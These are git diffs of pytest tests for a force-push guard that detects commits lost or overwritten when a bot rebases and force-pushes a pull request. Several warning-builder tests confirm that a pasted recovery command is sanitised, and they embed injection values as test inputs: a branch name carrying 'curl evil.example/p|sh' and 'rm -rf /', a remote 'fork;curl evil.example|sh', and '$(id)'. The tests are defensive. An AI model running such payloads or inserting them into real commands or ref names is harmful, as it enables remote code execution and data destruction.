+                      "c" * 12, "a" * 40):
+            assert token in warning
+
+    def test_long_lists_are_truncated(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            dropped_commits=[f"sha{i:04d} subject {i}" for i in range(12)],
+        )
+        warning = build_push_warning(findings, "feature")
+        assert "… and 2 more" in warning
+        assert "subject 11" not in warning
+
+    def test_recovery_instructions_always_present(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            modified_commits=["abc1234 tweaked"],
+        )
+        warning = build_push_warning(findings, "feature")
+        assert f"git fetch origin {'a' * 12}" in warning
+        assert "feature-backup" in warning
+
+    def test_non_github_provider_degrades_to_plain_prefix(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            dropped_commits=["abc1234 lost"],
+        )
+        warning = build_push_warning(findings, "feature", provider="jira")
+        assert warning.startswith("CAUTION:")
+        assert "[!CAUTION]" not in warning

--- a/koan/tests/test_force_push_guard.py
+++ b/koan/tests/test_force_push_guard.py
@@ -83,6 +83,7 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings is not None
         assert not findings.has_findings
@@ -99,6 +100,7 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings.has_findings and findings.is_critical
         assert any("feature 2" in c for c in findings.dropped_commits)
@@ -124,6 +126,7 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings.has_findings and not findings.is_critical
         assert any("feature 2" in c for c in findings.modified_commits)
@@ -155,6 +158,7 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[observed],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings.is_critical
         assert any("human hotfix" in c for c in findings.clobbered_commits)
@@ -177,6 +181,7 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings.has_findings and not findings.is_critical
         assert findings.remote_head_now == racer_sha
@@ -206,6 +211,7 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings is not None
         assert not findings.has_findings
@@ -251,9 +257,110 @@ class TestVerifyContentPreserved:
             pre, "origin/main", str(work),
             pre_push_remote_heads=[pre],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings is not None
         assert not findings.has_findings
+
+    def test_lost_merge_resolution_detected(self, pr_setup):
+        """A merge commit's own resolution content is invisible to `git cherry`
+        and dropped by a plain (non --rebase-merges) rebase — the guard must
+        still see it go (review finding: merge-resolution content never
+        checked)."""
+        work = pr_setup.work
+
+        # The PR merges main in and resolves with content that exists in
+        # neither parent (an "evil merge" — a conflict resolution).
+        _git(work, "merge", "--no-commit", "--no-ff", "origin/main")
+        (work / "a.txt").write_text("one\nRESOLUTION ONLY IN THE MERGE\n")
+        _git(work, "add", "a.txt")
+        _git(work, "commit", "-m", "Merge origin/main into feature")
+        pre = _git_out(work, "rev-parse", "HEAD")
+        _git(work, "push", "origin", "feature", "--force")
+
+        # A plain rebase replays only the first-parent commits: the two feature
+        # commits survive byte-for-byte, the resolution does not.
+        _git(work, "checkout", "-B", "feature", "origin/main")
+        _git(work, "cherry-pick", f"{pre}^^", f"{pre}^")  # the two feature commits
+        _git(work, "push", "origin", "feature", "--force")
+        pushed = _git_out(work, "rev-parse", "HEAD")
+
+        findings = verify_content_preserved(
+            pre, "origin/main", str(work),
+            pre_push_remote_heads=[pre],
+            push_remote="origin", branch="feature", pushed_head=pushed,
+        )
+        assert findings.is_critical
+        assert any("Merge origin/main" in c for c in findings.dropped_commits)
+        assert findings.dropped_files == ["a.txt"]
+        # The resolution really is gone from what was pushed.
+        assert "RESOLUTION" in _git_out(work, "show", f"{pre}:a.txt")
+        assert "RESOLUTION" not in _git_out(work, "show", f"{pushed}:a.txt")
+
+    def test_routine_merge_without_own_content_does_not_warn(self, pr_setup):
+        """Merging the base into the PR resolves nothing of its own; dropping
+        such a merge is exactly what a rebase is for — no warning."""
+        work = pr_setup.work
+        _git(work, "merge", "--no-ff", "-m", "Merge origin/main", "origin/main")
+        pre = _git_out(work, "rev-parse", "HEAD")
+        _git(work, "push", "origin", "feature", "--force")
+
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pre, "origin/main", str(work),
+            pre_push_remote_heads=[pre],
+            push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
+        )
+        assert findings is not None
+        assert not findings.has_findings
+
+    def test_duplicate_line_elsewhere_does_not_mask_a_drop(self, tmp_path):
+        """The same text living elsewhere in the file must not make a reverted
+        change look preserved (review finding: line-presence heuristic can
+        silently clear dropped work)."""
+        bare = tmp_path / "remote.git"
+        bare.mkdir()
+        _git(bare, "init", "--bare", "-b", "main", ".")
+        seed = tmp_path / "seed"
+        _git(tmp_path, "clone", str(bare), "seed")
+        _git(seed, "config", "user.email", "t@t")
+        _git(seed, "config", "user.name", "t")
+        base_cfg = (
+            "[service_a]\nenabled = false\n\n[service_b]\nenabled = true\n"
+        )
+        _commit_file(seed, "svc.ini", base_cfg, "c1")
+        _git(seed, "push", "origin", "main")
+
+        # The PR flips service_a on — text that already exists under service_b.
+        _git(seed, "checkout", "-b", "feature")
+        _commit_file(
+            seed, "svc.ini", base_cfg.replace("false", "true"), "enable service_a",
+        )
+        _git(seed, "push", "origin", "feature")
+
+        work = tmp_path / "work"
+        _git(tmp_path, "clone", str(bare), "work")
+        _git(work, "config", "user.email", "t@t")
+        _git(work, "config", "user.name", "t")
+        _git(work, "checkout", "feature")
+        pre = _git_out(work, "rev-parse", "HEAD")
+
+        # A malformed rebase loses the change entirely.
+        _git(work, "reset", "--hard", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pre, "origin/main", str(work),
+            pre_push_remote_heads=[pre],
+            push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
+        )
+        assert findings.is_critical
+        assert any("enable service_a" in c for c in findings.dropped_commits)
+        assert findings.dropped_files == ["svc.ini"]
 
     def test_clobber_detected_in_gate_push_window(self, pr_setup):
         """A human push landing between the main push and the private-gate
@@ -313,6 +420,7 @@ class TestVerifyContentPreserved:
         """An unusable baseline SHA must not raise — the guard steps aside."""
         findings = verify_content_preserved(
             "0" * 40, "origin/main", str(pr_setup.work),
+            pushed_head=_git_out(pr_setup.work, "rev-parse", "HEAD"),
         )
         assert findings is None
 
@@ -330,6 +438,7 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings.analysis_truncated == 1
         assert len(findings.dropped_commits) == 1
@@ -343,9 +452,27 @@ class TestVerifyContentPreserved:
             pr_setup.pre_rebase_head, "origin/main", str(work),
             pre_push_remote_heads=[],  # observation failed
             push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
         )
         assert findings is not None
         assert findings.clobbered_commits == []
+
+    def test_unconfirmed_pushed_sha_skips_the_guard(self, pr_setup):
+        """Without a confirmed pushed SHA there is nothing trustworthy to
+        compare against — local HEAD may hold commits that never reached the
+        remote, so the guard must report itself skipped, not analyze it."""
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+        # A later local commit that never got pushed
+        _commit_file(work, "local.txt", "local", "unpushed work")
+
+        assert verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
+            push_remote="origin", branch="feature",
+            pushed_head="",
+        ) is None
 
 
 class TestObserveRemoteHead:
@@ -368,9 +495,21 @@ class TestClassifyMissingCommits:
         empty_sha = _git_out(work, "rev-parse", "HEAD")
         head = _git_out(work, "rev-parse", "HEAD")
         dropped, modified, touched = _classify_missing_commits(
-            str(work), [empty_sha], set(), pr_setup.pre_rebase_head, head,
+            str(work), [(empty_sha, False)], set(), pr_setup.pre_rebase_head, head,
         )
         assert dropped == [] and modified == [] and touched == set()
+
+    def test_unreadable_commit_is_reported_not_cleared(self, pr_setup):
+        """A git failure must never be converted into 'preserved' — an
+        unverifiable commit is surfaced for a human instead (review finding
+        'error converted to empty result')."""
+        work = pr_setup.work
+        head = _git_out(work, "rev-parse", "HEAD")
+        dropped, modified, touched = _classify_missing_commits(
+            str(work), [("0" * 40, False)], set(), pr_setup.pre_rebase_head, head,
+        )
+        assert dropped == [] and touched == set()
+        assert modified == ["000000000000"]
 
 
 class TestBuildPushWarning:
@@ -415,7 +554,46 @@ class TestBuildPushWarning:
         # The fetch must use the FULL SHA — git fetch cannot expand
         # abbreviated SHAs into want-lines, so a short SHA never works.
         assert f"git fetch origin {'a' * 40}" in warning
-        assert "feature-backup" in warning
+        assert "git switch -c koan-prerebase-aaaaaaaaaaaa FETCH_HEAD" in warning
+
+    def test_recovery_command_carries_no_branch_controlled_text(self):
+        """A maintainer pastes this into a shell. Ref names may legally contain
+        $(), backticks, ';' and '&' — none of it may reach the command."""
+        branch = "fix$(curl${IFS}evil.example/p|sh)`whoami`;rm -rf /"
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            dropped_commits=["abc1234 lost"],
+        )
+        warning = build_push_warning(findings, branch)
+        command = warning.split("recoverable: ")[1]
+        assert "$(" not in command
+        assert "`" not in command.rstrip("`")[1:]  # only the span delimiters
+        assert ";" not in command
+        assert "git switch -c koan-prerebase-aaaaaaaaaaaa FETCH_HEAD" in command
+        # The branch is still named in the prose, but only inside a code span
+        # it cannot escape (backticks squashed to quotes).
+        assert branch.replace("`", "'") in warning
+        assert branch not in warning
+
+    def test_recovery_command_quotes_a_hostile_remote(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            dropped_commits=["abc1234 lost"],
+        )
+        warning = build_push_warning(
+            findings, "feature", remote="fork;curl evil.example|sh",
+        )
+        assert "git fetch 'fork;curl evil.example|sh'" in warning
+
+    def test_unusable_baseline_sha_yields_a_static_backup_name(self):
+        """A non-SHA baseline must not be spliced into a branch name."""
+        findings = PushGuardFindings(
+            pre_rebase_head="$(id)",
+            dropped_commits=["abc1234 lost"],
+        )
+        warning = build_push_warning(findings, "feature")
+        assert "git switch -c koan-prerebase-backup FETCH_HEAD" in warning
+        assert "git fetch origin '$(id)'" in warning
 
     def test_recovery_command_uses_actual_push_remote(self):
         findings = PushGuardFindings(

--- a/koan/tests/test_force_push_guard.py
+++ b/koan/tests/test_force_push_guard.py
@@ -7,6 +7,7 @@ import pytest
 
 from app.force_push_guard import (
     PushGuardFindings,
+    _added_lines,
     _classify_missing_commits,
     build_push_warning,
     observe_remote_head,
@@ -296,6 +297,26 @@ class TestVerifyContentPreserved:
         # The resolution really is gone from what was pushed.
         assert "RESOLUTION" in _git_out(work, "show", f"{pre}:a.txt")
         assert "RESOLUTION" not in _git_out(work, "show", f"{pushed}:a.txt")
+
+    def test_octopus_merge_resolution_is_parsed(self, pr_setup):
+        """A 3-parent merge's own content carries three '+' markers — the same
+        shape as a diff's '+++' file header. The parser must tell them apart."""
+        work = pr_setup.work
+        for name in ("side1", "side2"):
+            _git(work, "checkout", "-b", name, "origin/main")
+            _commit_file(work, f"{name}.txt", name, f"{name} work")
+        _git(work, "checkout", "feature")
+        _git(work, "merge", "--no-ff", "-m", "Octopus merge", "side1", "side2")
+        (work / "a.txt").write_text("one\nOCTOPUS RESOLUTION\n")
+        _git(work, "add", "a.txt")
+        _git(work, "commit", "--amend", "--no-edit")
+        pre = _git_out(work, "rev-parse", "HEAD")
+
+        added = _added_lines(str(work), pre, merge=True)
+        assert "OCTOPUS RESOLUTION" in added
+        # The "+++ b/a.txt" file header keeps three markers whatever the parent
+        # count, so it must not be mistaken for content.
+        assert not any(line.endswith("a.txt") for line in added)
 
     def test_routine_merge_without_own_content_does_not_warn(self, pr_setup):
         """Merging the base into the PR resolves nothing of its own; dropping

--- a/koan/tests/test_force_push_guard.py
+++ b/koan/tests/test_force_push_guard.py
@@ -81,7 +81,7 @@ class TestVerifyContentPreserved:
 
         findings = verify_content_preserved(
             pr_setup.pre_rebase_head, "origin/main", str(work),
-            pre_push_remote_head=pr_setup.pre_rebase_head,
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
         )
         assert findings is not None
@@ -97,7 +97,7 @@ class TestVerifyContentPreserved:
 
         findings = verify_content_preserved(
             pr_setup.pre_rebase_head, "origin/main", str(work),
-            pre_push_remote_head=pr_setup.pre_rebase_head,
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
         )
         assert findings.has_findings and findings.is_critical
@@ -122,7 +122,7 @@ class TestVerifyContentPreserved:
 
         findings = verify_content_preserved(
             pr_setup.pre_rebase_head, "origin/main", str(work),
-            pre_push_remote_head=pr_setup.pre_rebase_head,
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
         )
         assert findings.has_findings and not findings.is_critical
@@ -132,7 +132,7 @@ class TestVerifyContentPreserved:
 
         warning = build_push_warning(findings, "feature")
         assert warning.startswith("> [!WARNING]")
-        assert "verify" in warning
+        assert "check these survived" in warning
 
     def test_clobbered_concurrent_push_detected(self, pr_setup):
         """A human push that lands mid-rebase and gets force-pushed over."""
@@ -153,7 +153,7 @@ class TestVerifyContentPreserved:
 
         findings = verify_content_preserved(
             pr_setup.pre_rebase_head, "origin/main", str(work),
-            pre_push_remote_head=observed,
+            pre_push_remote_heads=[observed],
             push_remote="origin", branch="feature",
         )
         assert findings.is_critical
@@ -175,7 +175,7 @@ class TestVerifyContentPreserved:
 
         findings = verify_content_preserved(
             pr_setup.pre_rebase_head, "origin/main", str(work),
-            pre_push_remote_head=pr_setup.pre_rebase_head,
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
             push_remote="origin", branch="feature",
         )
         assert findings.has_findings and not findings.is_critical
@@ -185,6 +185,130 @@ class TestVerifyContentPreserved:
         assert warning.startswith("> [!WARNING]")
         assert racer_sha[:12] in warning
 
+    def test_upstream_squash_merge_counts_as_preserved(self, pr_setup):
+        """The PR's content lands on main as ONE squashed commit; the rebase
+        drops both PR commits as become-empty. Patch-ids match nothing, but
+        nothing was lost — the guard must stay silent (review finding #1)."""
+        work, seed = pr_setup.work, pr_setup.seed
+
+        # Upstream squash-merges the PR content in a single commit
+        (seed / "f1.txt").write_text("f1")
+        (seed / "f2.txt").write_text("f2")
+        _git(seed, "add", "f1.txt", "f2.txt")
+        _git(seed, "commit", "-m", "squash-merge of feature (#1)")
+        _git(seed, "push", "origin", "main")
+
+        _git(work, "fetch", "origin", "+refs/heads/main:refs/remotes/origin/main")
+        _git(work, "rebase", "origin/main")  # both PR commits become empty
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
+            push_remote="origin", branch="feature",
+        )
+        assert findings is not None
+        assert not findings.has_findings
+
+    def test_context_line_drift_does_not_warn(self, tmp_path):
+        """Upstream edits near a PR hunk shift the patch-id on a perfectly
+        clean rebase — the guard must not cry wolf (review finding #5)."""
+        bare = tmp_path / "remote.git"
+        bare.mkdir()
+        _git(bare, "init", "--bare", "-b", "main", ".")
+        seed = tmp_path / "seed"
+        _git(tmp_path, "clone", str(bare), "seed")
+        _git(seed, "config", "user.email", "t@t")
+        _git(seed, "config", "user.name", "t")
+        lines = [f"line {i}" for i in range(1, 11)]
+        _commit_file(seed, "code.txt", "\n".join(lines) + "\n", "c1")
+        _git(seed, "push", "origin", "main")
+
+        # PR edits line 2
+        _git(seed, "checkout", "-b", "feature")
+        lines_pr = lines.copy()
+        lines_pr[1] = "line 2 CHANGED BY PR"
+        _commit_file(seed, "code.txt", "\n".join(lines_pr) + "\n", "pr edit")
+        _git(seed, "push", "origin", "feature")
+
+        # Upstream edits line 4 — inside the PR hunk's context window
+        _git(seed, "checkout", "main")
+        lines_up = lines.copy()
+        lines_up[3] = "line 4 changed upstream"
+        _commit_file(seed, "code.txt", "\n".join(lines_up) + "\n", "upstream edit")
+        _git(seed, "push", "origin", "main")
+
+        work = tmp_path / "work"
+        _git(tmp_path, "clone", str(bare), "work")
+        _git(work, "config", "user.email", "t@t")
+        _git(work, "config", "user.name", "t")
+        _git(work, "checkout", "feature")
+        pre = _git_out(work, "rev-parse", "HEAD")
+        _git(work, "rebase", "origin/main")  # clean — no conflict
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pre, "origin/main", str(work),
+            pre_push_remote_heads=[pre],
+            push_remote="origin", branch="feature",
+        )
+        assert findings is not None
+        assert not findings.has_findings
+
+    def test_clobber_detected_in_gate_push_window(self, pr_setup):
+        """A human push landing between the main push and the private-gate
+        re-push must be caught via the gate's own fresh observation
+        (review finding #3)."""
+        work, seed = pr_setup.work, pr_setup.seed
+        _git(work, "rebase", "origin/main")
+        step6_obs = observe_remote_head("origin", "feature", str(work))
+        _git(work, "push", "origin", "feature", "--force")
+
+        # Human pushes on top of the freshly pushed branch...
+        _git(seed, "fetch", "origin")
+        _git(seed, "checkout", "-B", "feature", "origin/feature")
+        _commit_file(seed, "hotfix.txt", "urgent", "post-push hotfix")
+        _git(seed, "push", "origin", "feature")
+
+        # ...then the gate makes a fix and force-pushes over it
+        gate_obs = observe_remote_head("origin", "feature", str(work))
+        _commit_file(work, "gatefix.txt", "fix", "gate fix")
+        _git(work, "push", "origin", "feature", "--force")
+        pushed = _git_out(work, "rev-parse", "HEAD")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_heads=[step6_obs, gate_obs],
+            push_remote="origin", branch="feature", pushed_head=pushed,
+        )
+        assert findings.is_critical
+        assert any("post-push hotfix" in c for c in findings.clobbered_commits)
+        # The gate observation contains Kōan's own step-6 push too — that must
+        # not be reported, only the human's commit.
+        assert not any("gate fix" in c for c in findings.clobbered_commits)
+        assert len(findings.clobbered_commits) == 1
+
+    def test_unpushed_local_commit_is_not_a_race(self, pr_setup):
+        """Gate commits locally but its push fails: comparing against the
+        recorded pushed SHA must not fake a post-push race and must not
+        treat the unpushed commit as pipeline output (review finding #4)."""
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+        pushed = _git_out(work, "rev-parse", "HEAD")
+
+        # A gate fix commit exists locally but never reached the remote
+        _commit_file(work, "gatefix.txt", "fix", "gate fix (push failed)")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
+            push_remote="origin", branch="feature", pushed_head=pushed,
+        )
+        assert findings is not None
+        assert findings.remote_head_now == ""  # remote == what we pushed
+        assert not findings.has_findings
+
     def test_guard_degrades_to_none_on_bad_input(self, pr_setup):
         """An unusable baseline SHA must not raise — the guard steps aside."""
         findings = verify_content_preserved(
@@ -192,13 +316,32 @@ class TestVerifyContentPreserved:
         )
         assert findings is None
 
+    def test_analysis_cap_limits_per_commit_work(self, pr_setup, monkeypatch):
+        """A history rewrite can mark hundreds of commits — analysis is capped
+        and the cap is reported instead of stalling (review finding #6)."""
+        import app.force_push_guard as fpg
+        monkeypatch.setattr(fpg, "_MAX_ANALYZED", 1)
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "reset", "--hard", "HEAD~2")  # lose both feature commits
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
+            push_remote="origin", branch="feature",
+        )
+        assert findings.analysis_truncated == 1
+        assert len(findings.dropped_commits) == 1
+        assert "not analyzed" in build_push_warning(findings, "feature")
+
     def test_missing_pre_push_observation_skips_clobber_check(self, pr_setup):
         work = pr_setup.work
         _git(work, "rebase", "origin/main")
         _git(work, "push", "origin", "feature", "--force")
         findings = verify_content_preserved(
             pr_setup.pre_rebase_head, "origin/main", str(work),
-            pre_push_remote_head="",  # observation failed
+            pre_push_remote_heads=[],  # observation failed
             push_remote="origin", branch="feature",
         )
         assert findings is not None
@@ -223,8 +366,9 @@ class TestClassifyMissingCommits:
         work = pr_setup.work
         _git(work, "commit", "--allow-empty", "-m", "empty marker")
         empty_sha = _git_out(work, "rev-parse", "HEAD")
+        head = _git_out(work, "rev-parse", "HEAD")
         dropped, modified, touched = _classify_missing_commits(
-            str(work), [empty_sha], set(),
+            str(work), [empty_sha], set(), pr_setup.pre_rebase_head, head,
         )
         assert dropped == [] and modified == [] and touched == set()
 
@@ -268,8 +412,50 @@ class TestBuildPushWarning:
             modified_commits=["abc1234 tweaked"],
         )
         warning = build_push_warning(findings, "feature")
-        assert f"git fetch origin {'a' * 12}" in warning
+        # The fetch must use the FULL SHA — git fetch cannot expand
+        # abbreviated SHAs into want-lines, so a short SHA never works.
+        assert f"git fetch origin {'a' * 40}" in warning
         assert "feature-backup" in warning
+
+    def test_recovery_command_uses_actual_push_remote(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            modified_commits=["abc1234 tweaked"],
+        )
+        warning = build_push_warning(findings, "feature", remote="fork-alice")
+        assert f"git fetch fork-alice {'a' * 40}" in warning
+        assert "git fetch origin" not in warning
+
+    def test_commit_subjects_are_neutralized_in_code_spans(self):
+        """Subjects are attacker-influenced: no mentions/markdown may render."""
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            dropped_commits=["abc1234 @everyone [pwn](https://evil) `x"],
+        )
+        warning = build_push_warning(findings, "feature")
+        # Wrapped in a code span, with embedded backticks squashed so the
+        # subject cannot terminate its own span.
+        assert "- `abc1234` `@everyone [pwn](https://evil) 'x`" in warning
+
+    def test_dropped_files_truncation_is_visible(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            dropped_commits=["abc1234 lost"],
+            dropped_files=[f"file{i:02d}.txt" for i in range(12)],
+        )
+        warning = build_push_warning(findings, "feature")
+        assert "… and 2 more" in warning
+        assert "file11.txt" not in warning
+
+    def test_analysis_truncation_is_reported(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            analysis_truncated=57,
+        )
+        assert findings.has_findings and not findings.is_critical
+        warning = build_push_warning(findings, "feature")
+        assert warning.startswith("> [!WARNING]")
+        assert "57" in warning and "not analyzed" in warning
 
     def test_non_github_provider_degrades_to_plain_prefix(self):
         findings = PushGuardFindings(

--- a/koan/tests/test_rebase_pr.py
+++ b/koan/tests/test_rebase_pr.py
@@ -4624,9 +4624,72 @@ class TestPushWithFallbackGuardKeys:
             )
         assert result["success"] is True
         assert result["remote"] == "origin"
-        assert result["pre_push_remote_head"] == "cafe" * 10
+        assert result["pre_push_remote_heads"] == ["cafe" * 10]
         assert result["pushed_head"] == "beef" * 10
         observe.assert_called_once_with("origin", "koan/fix", "/project")
+
+    def test_lease_rejection_records_the_tip_that_caused_it(self):
+        """A rejected --force-with-lease means the remote moved after the first
+        observation; the tip the plain --force is about to clobber must be
+        observed too, or the guard can never name it."""
+        def mock_run(cmd, **kwargs):
+            if "--force-with-lease" in cmd:
+                raise RuntimeError("stale info")
+            return MagicMock(returncode=0, stdout="", stderr="")
+
+        observed = ["cafe" * 10, "dead" * 10]  # tip before, tip after it moved
+        with patch("app.claude_step.subprocess.run", side_effect=mock_run), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 side_effect=observed,
+             ):
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": "https://..."}, "/project",
+            )
+        assert result["success"] is True
+        assert result["pre_push_remote_heads"] == observed
+
+    def test_unchanged_tip_is_not_observed_twice(self):
+        """The lease can also fail for reasons other than a moved tip — the
+        same SHA must not be listed twice."""
+        def mock_run(cmd, **kwargs):
+            if "--force-with-lease" in cmd:
+                raise RuntimeError("stale info")
+            return MagicMock(returncode=0, stdout="", stderr="")
+
+        with patch("app.claude_step.subprocess.run", side_effect=mock_run), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 return_value="cafe" * 10,
+             ):
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": "https://..."}, "/project",
+            )
+        assert result["pre_push_remote_heads"] == ["cafe" * 10]
+
+    def test_failed_push_reports_no_pushed_head(self):
+        """A SHA that never reached the remote must not be reported as pushed."""
+        def mock_run(cmd, **kwargs):
+            if cmd[:2] == ["git", "push"]:
+                raise RuntimeError("rejected")
+            return MagicMock(returncode=0, stdout="", stderr="")
+
+        with patch("app.claude_step.subprocess.run", side_effect=mock_run), \
+             patch("app.rebase_pr._run_git", return_value="beef" * 10 + "\n"), \
+             patch(
+                 "app.rebase_pr.force_push_guard.observe_remote_head",
+                 return_value="cafe" * 10,
+             ):
+            result = _push_with_fallback(
+                "koan/fix", "main", "sukria/koan", "42",
+                {"title": "Fix", "url": ""}, "/project",
+            )
+        assert result["success"] is False
+        assert not result.get("pushed_head")
 
 
 class TestRunForcePushGuard:
@@ -4664,6 +4727,58 @@ class TestRunForcePushGuard:
         assert any("Force-push guard" in a and "see the warning" in a for a in log)
         assert len(notified) == 1
         assert "PR #42" in notified[0]
+
+    def test_alert_is_not_progress_gated(self):
+        """The guard finding is a safety outcome: it must reach the human even
+        in normal mode, where progress messages are suppressed."""
+        from app.messaging_level import progress_notify
+        sent = []
+        with patch("app.messaging_level.is_debug", return_value=False):
+            notifier = progress_notify(sent.append, log_category="rebase")
+            notifier("Pushing `koan/fix`...")  # progress — suppressed
+            with patch(
+                "app.rebase_pr.force_push_guard.verify_content_preserved",
+                return_value="findings",
+            ), patch(
+                "app.rebase_pr.force_push_guard.build_push_warning",
+                return_value="> [!CAUTION]\n> boom",
+            ):
+                _run_force_push_guard(
+                    pre_rebase_head="a" * 40,
+                    target_ref="origin/main",
+                    project_path="/project",
+                    push_state={"remote": "origin", "pushed_head": "c" * 40},
+                    branch="koan/fix",
+                    pr_number="42",
+                    actions_log=[],
+                    notify_fn=notifier,
+                )
+        assert len(sent) == 1
+        assert "Force-push guard" in sent[0]
+
+    def test_alert_delivery_failure_is_non_fatal(self):
+        def boom(_msg):
+            raise RuntimeError("telegram down")
+
+        with patch(
+            "app.rebase_pr.force_push_guard.verify_content_preserved",
+            return_value="findings",
+        ), patch(
+            "app.rebase_pr.force_push_guard.build_push_warning",
+            return_value="> [!CAUTION]\n> boom",
+        ):
+            section = _run_force_push_guard(
+                pre_rebase_head="a" * 40,
+                target_ref="origin/main",
+                project_path="/project",
+                push_state={"remote": "origin", "pushed_head": "c" * 40},
+                branch="koan/fix",
+                pr_number="42",
+                actions_log=[],
+                notify_fn=boom,
+            )
+        # The PR comment still carries the finding even if chat delivery failed.
+        assert section == "> [!CAUTION]\n> boom"
 
     def test_clean_check_logs_preserved(self):
         result, log, notified = self._run(section="")
@@ -4712,7 +4827,7 @@ class TestGatePushStatePropagation:
             "actions": ["Force-pushed `koan/fix` to upstream"],
             "error": "",
             "remote": "upstream",
-            "pre_push_remote_head": "obs1" * 10,
+            "pre_push_remote_heads": ["obs1" * 10],
             "pushed_head": "new1" * 10,
         }), patch("app.private_review_gate.run_private_review_gate",
                   side_effect=fake_gate), \
@@ -4729,3 +4844,38 @@ class TestGatePushStatePropagation:
         assert push_state["remote"] == "upstream"
         assert push_state["pushed_head"] == "new1" * 10
         assert push_state["observations"] == ["pre0" * 10, "obs1" * 10]
+
+    def test_gate_push_without_confirmed_sha_clears_pushed_head(self):
+        """If the gate pushed but its SHA capture failed, the step-6 SHA is
+        stale: keeping it would fake a post-push race. Clearing it makes the
+        guard skip instead — the honest outcome."""
+        push_state = {
+            "remote": "origin",
+            "pushed_head": "old0" * 10,
+            "observations": ["pre0" * 10],
+        }
+
+        def fake_gate(**kwargs):
+            kwargs["push_fn"]()
+            return SimpleNamespace(ran=True, summary="ok", skipped_reason="")
+
+        with patch("app.rebase_pr._push_with_fallback", return_value={
+            "success": True,
+            "actions": [],
+            "error": "",
+            "remote": "origin",
+            "pre_push_remote_heads": [],
+            "pushed_head": "",
+        }), patch("app.private_review_gate.run_private_review_gate",
+                  side_effect=fake_gate), \
+             patch("app.utils.project_name_for_path", return_value="proj"):
+            from app.rebase_pr import _run_rebase_private_review_gate
+            _run_rebase_private_review_gate(
